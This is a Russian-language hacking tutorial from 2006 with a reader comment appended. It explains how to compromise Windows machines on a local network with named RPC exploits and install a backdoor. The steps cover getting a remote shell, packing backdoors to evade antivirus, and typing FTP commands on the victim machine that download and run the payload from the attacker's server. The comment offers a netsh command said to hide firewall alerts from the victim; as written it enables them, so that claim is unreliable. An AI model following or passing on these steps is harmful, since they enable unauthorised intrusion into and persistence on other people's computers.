Все материалы предоставлены только с ознакомительной целью
Главная — Статьи — Хакинг — Ломаем локалку
Ломаем локалку
© Ak_mind 04.01.2006 статья не оптимизирована
© Ak_mind 04.01.2006 статья не оптимизирована
Взлом своей локалки! Как много в этом словосочетании! Все мы когда-то начинали
свою карьеру на поприще хакинга именно с этого. Став "большими дядями" мы
почему-то начинаем чураться таких видов взлома, а ведь все начинается с малого!
Дорога к вершинам хакерской лестницы лежит именно со взлома локальных сетей. Я
надеюсь что эта маленькая статья поможет тебе шагнуть на самую первую ее
ступеньку. В ней я расскажу тебе как протроянить чужую машину под управлением
ОС WINDOWS.
Для того чтобы залить бэкдоор на тачку с Виндой нам понадобиться:
Kaht, Kaht2 - эксплоиты дающие шелл(доступ к cmd) на удаленной машине так же
как и Rpc, Rpc2 Rpc3, LCC.
Я бы посоветовал иметь все выше перечисленные программы, так как эти сплоты не
новые и работают процентов на 40 (представьте себе даже с таким процентом и
количеством выпущенных заплаток я смог протроянить 6 из 10 (!) компов в своей
локальной сети)
Еще нам понадобиться FTP сервер, для того чтобы мы могли закачивать Трояны на
жертву. Самый лучший по моему мнению ServerU. Он легок в настройке. И довольно
прост в применении.
Кроме того, нам нужен какой-нибуть бэкдор. Можно попробовать AntiLAmer BakDorr
или LamerDeath. Их множество, но что самое ужасное они все паляться
антивирусами. Можно конечно постараться сжать его при помощи FSG процент
непропалиться подскочит, но не на много.
Теперь, когда у нас все есть, приступим к активным действиям.
1.Узнаем ip
Нам либо сразу известен он, либо мы Знаем DNS-имя если DNS тогда вводим в
командной строке
$ping <имя >
И дальше высматриваем там IP.
2.Атакуем
Запускаем один из эксплоитов, большинство запускаются в режиме Мс-ДОС.
Если атака прошла успешно, и перед нами появилась командная строка, переходим к
следующему пункту, если нет, то пробуем другой эксплоит.
Теперь нам надо закрепиться в системе на долгое время, чтобы у пользователя на
всю жизнь остались воспоминания о тех прекрасных днях когда у него стаял твой
бэкдор =).
3.Заливаем Трояна или бэкдоор.
Устанавливаем и запускаем фтп сервер. В некоторых версия RPC FTP встроен, но я
ему не доверяю.
В командной строке на удаленном компе вводим:
$Ftp
$open
Далее в зависимости от настроек твоего FTP вводишь имя пользователя, и пароль
которые ты установил.
$dir - смотришь файлы которые ты открыл для скачки.
$get <имя вируса>- закачка
$quit - выходим из соединения с FTP.
$<имя того, что закачал>- запуск на удаленном компе
ВСЕ если у него нет Антивируса и файра то все будет работать
К сожалению сплоиты не новые поэтому работать будут не всегда, более новые можно
найти на Securitylab.ru но преимущество тех что я перечислил Они
откомпилированы.
Если найдешь более новый откомпиленный сплоит то стучи 192232206 =)
© Ak_mind 04.01.2006 статья не оптимизирована
Привет, это хотел бы добавить если при взлома тачки ты получил контроль к cmd, и все же на тачке есть фаер волл, конечно без палево ты не сможешь открыть соеденение с FTP сервером, для того что бы пользователь не увидел сообщение фаерволла о том что данный сервис хочет сделать, примени эту команду на машине жертвы:
netsh firewall set notifications ENABLE
Данная команда отключает вывод сообщений фаерволла и пользователь не о чем не узнает.